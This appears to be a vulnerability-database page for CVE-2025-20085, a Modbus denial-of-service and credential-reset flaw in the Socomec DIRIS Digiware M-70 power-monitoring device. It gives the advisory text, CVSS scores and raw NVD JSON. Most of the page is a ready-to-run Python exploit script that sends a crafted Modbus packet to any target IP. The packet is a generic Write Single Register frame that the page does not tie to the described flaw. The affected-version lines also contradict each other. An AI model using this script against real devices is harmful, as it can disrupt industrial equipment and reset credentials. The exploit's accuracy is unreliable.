Security Vulnerability Report
中文
CVE-2025-20085 CVSS 7.2 HIGH

CVE-2025-20085

Published: 2025-12-01 16:15:52
Last Modified: 2025-12-05 20:49:00
Source: [email protected]

Description

A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service and weaken credentials resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE
Socomec DIRIS Digiware M-70 < 1.6.9
Socomec DIRIS Digiware M-70 1.6.9 (已知受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-20085 PoC - Socomec DIRIS Digiware M-70 Modbus RTU DoS Reference: TALOS-2025-2138 Note: This is for educational and authorized testing purposes only """ import socket import struct import sys def create_modbus_rtu_packet(): """Craft a malicious Modbus RTU over TCP packet""" # Modbus Application Protocol Header transaction_id = struct.pack('>H', 0x0001) # Transaction Identifier protocol_id = struct.pack('>H', 0x0000) # Protocol Identifier (Modbus) length = struct.pack('>H', 0x0006) # Length unit_id = struct.pack('B', 0xFF) # Unit Identifier # Modbus Function Code (Write Single Register - commonly exploited) function_code = struct.pack('B', 0x06) reference_number = struct.pack('>H', 0x0000) register_value = struct.pack('>H', 0x0000) return transaction_id + protocol_id + length + unit_id + function_code + reference_number + register_value def exploit(target_ip, target_port=502): """Send exploit packet to target""" print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Crafting malicious Modbus RTU packet...") packet = create_modbus_rtu_packet() try: print(f"[*] Sending exploit packet...") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) sock.send(packet) print(f"[+] Packet sent successfully") print(f"[+] Target may be affected - check device status") sock.close() except socket.timeout: print(f"[-] Connection timeout - target may be vulnerable and not responding") except socket.error as e: print(f"[-] Socket error: {e}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 502 exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20085", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:51.960", "lastModified": "2025-12-05T20:49:00.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service and weaken credentials resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2138", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.socomec.fr/sites/default/files/2025-04/CVE-2025-20085---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-14-39_English_0.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2138", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.